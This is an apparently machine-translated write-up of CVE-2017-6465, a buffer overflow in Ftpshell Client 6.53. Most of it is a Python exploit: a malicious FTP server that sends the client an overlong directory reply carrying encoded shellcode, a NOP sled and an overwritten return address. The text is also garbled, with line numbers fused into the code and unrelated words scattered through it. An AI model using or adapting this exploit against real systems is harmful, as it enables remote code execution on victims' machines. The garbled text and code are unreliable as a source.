Buffer overflow utilization of cve-2017-6465 Ftpshell Client 6.53

Tag: CTO does not replace Python except add in link nbsp overflow

0x00. Preface

Ftpshell is a popular FTP service tool under the foreign Windows platform, up to the latest version of the client 6.53:http://www.ftpshell.com/downloadclient.htm#

Lab Environment: VMWare + WinXP SP3 EN

Vulnerable App get Address: http://www.ftpshell.com/downloadclient.htm#

0x01. Using

This buffer overflow vulnerability occurs when the client initializes the authentication connection phase with the FTP server, and first installs the Ftpshell client in the experimental environment. 6.53

Here we build a malicious FTP server directly using Python code provided by explit-db

1 #Exploit Title:ftpshell Client 6.53 buffer overflow on making initial connection2 #date:2017-03-043 #Exploit author:peter Baris4 #Vendor homepage:http://www.saptech-erp.com.au5 #Software link:http://www.ftpshell.com/downloadclient.htm6 #version:windows Server R2 x647 #tested On:windows Server R2 Standard x648 #cve:cve-2017-64659 #2017-03-04:software Vendor notifiedTen #2017-03-06:no reply One #2017-03-06:publishing A  - ImportSocket - ImportSYS the   -Shell= ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" - "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" - "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" + "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" - "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44" + "\x42\x30\x42\x50\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x58\x4e\x37" A "\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x44\x4a\x41\x4b\x48" at "\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48" - "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x48\x42\x4c" - "\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x30\x44\x4c\x4b\x4e" - "\x46\x4f\x4b\x43\x46\x35\x46\x42\x46\x30\x45\x47\x45\x4e\x4b\x48" - "\x4f\x35\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" - "\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x31\x4b\x48" in "\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x43" - "\x42\x4c\x46\x46\x4b\x48\x42\x54\x42\x53\x45\x38\x42\x4c\x4a\x57" to "\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x48\x42\x37\x4e\x51\x4d\x4a" + "\x4b\x58\x4a\x56\x4a\x50\x4b\x4e\x49\x30\x4b\x38\x42\x38\x42\x4b" - "\x42\x50\x42\x30\x42\x50\x4b\x58\x4a\x46\x4e\x43\x4f\x35\x41\x53" the "\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37" * "\x42\x35\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x4a\x46\x4a\x49" $ "\x50\x4f\x4c\x58\x50\x30\x47\x45\x4f\x4f\x47\x4e\x43\x36\x41\x46"Panax Notoginseng "\x4e\x36\x43\x46\x42\x50\x5a")#replace it with a pop-up calc.exe shellcode. -   thePort = 21 +   A Try: thes =Socket.socket (socket.af_inet, socket. SOCK_STREAM) +S.bind (("0.0.0.0", port))#bind to Port 21 -S.listen (5)#Turn on FTP service monitoring $         Print("[i] FTP server started on port:"+STR (Port) +"\ r \ n") $ except: -         Print("[!] Failed to bind the server to port:"+STR (Port) +"\ r \ n") -   the   - #004B95DC in Ftpshell.exe PUSH ESI; RETNWuyiEIP ="\xdc\x95\x4b" 　　 #This address can still be used in WinXP SP3 en theNops ="\x90"*8 -Junk ="A"* (400-len (Nops)-Len (shell)) WuBuffer = Nops + Shell + junk + EIP#constructs a malicious buffer structure -   About  whileTrue: $conn, addr =s.accept () -Conn.send ('Welcome to your unfriendly FTP server\r\n') -     Print(CONN.RECV (1024)) -Conn.send ("331 ok\r\n") A     Print(CONN.RECV (1024)) +Conn.send ('ok\r\n') the     Print(CONN.RECV (1024)) -Conn.send ('"'+buffer+'" is current directory\r\n')#Send malicious buffer structure

Execute script, start service

The victim machine Ftpshell Client Connection Malicious FTP server, can find the client immediately error, Shellcode is executed

Note: I did not experiment in Win2008 SP2

0x02. Reference links

exploit-db:https://www.exploit-db.com/exploits/41511/

Buffer overflow utilization of cve-2017-6465 Ftpshell Client 6.53